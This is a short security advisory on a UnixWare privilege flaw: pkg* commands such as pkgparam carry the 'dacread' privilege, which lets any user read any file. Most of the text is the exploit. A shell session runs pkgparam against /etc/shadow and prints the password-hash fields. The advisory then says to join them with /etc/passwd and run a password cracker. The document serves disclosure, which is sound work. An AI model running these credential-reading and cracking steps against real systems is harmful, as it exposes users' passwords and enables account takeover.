As we wrote before, UnixWare binaries gain additional privileges via standard suid/sgid and /etc/security/tcb/privs. The majority of the UnixWare "pkg" command (such as pkginfo, pkgcat, pkgparam, etc) is vulnerable to a bug that allows any user to read arbitrary files on the system as a result of their additional "dacread" permission in the privs file.
Credit:
The information has been provided by: Brock Tellier.
The dacread permission allows a process to override the Discretionary Access Controls (DAC) for read-only operations. Basically, a process with the dacread permissions is able to bypass the mode bits and ownership on a file, but only for reading it. A process with dacwrite permissions can bypass mode bits to write to or execute that file.
Exploit:
The worst offender of pkg* is pkgparam, which will print the contents of a file to stdout, though most of the pkg programs can be forced to read from /etc/shadow in one-way or another and grab the contents with truss.
bash-2.02$ ls -la /bin/pkgparam
-r-xr-xr-x 1 root sys 166784 May 21 1999
/bin/pkgparam
bash-2.02$ /bin/pkgparam -f /etc/shadow
Dy0l3OC7XHsj.:10925::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
BgusHRQZ9MH2U:10878::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
nv.Xrh2V3vArc:10882::::::
ozT.yeRe1/dxY:10882::::::
RinwpQfqabYbc:10928::::::
bash-2.02$
Now just concatenate the first field of /etc/passwd with this file and run your favorite cracker (for example, John the Ripper).
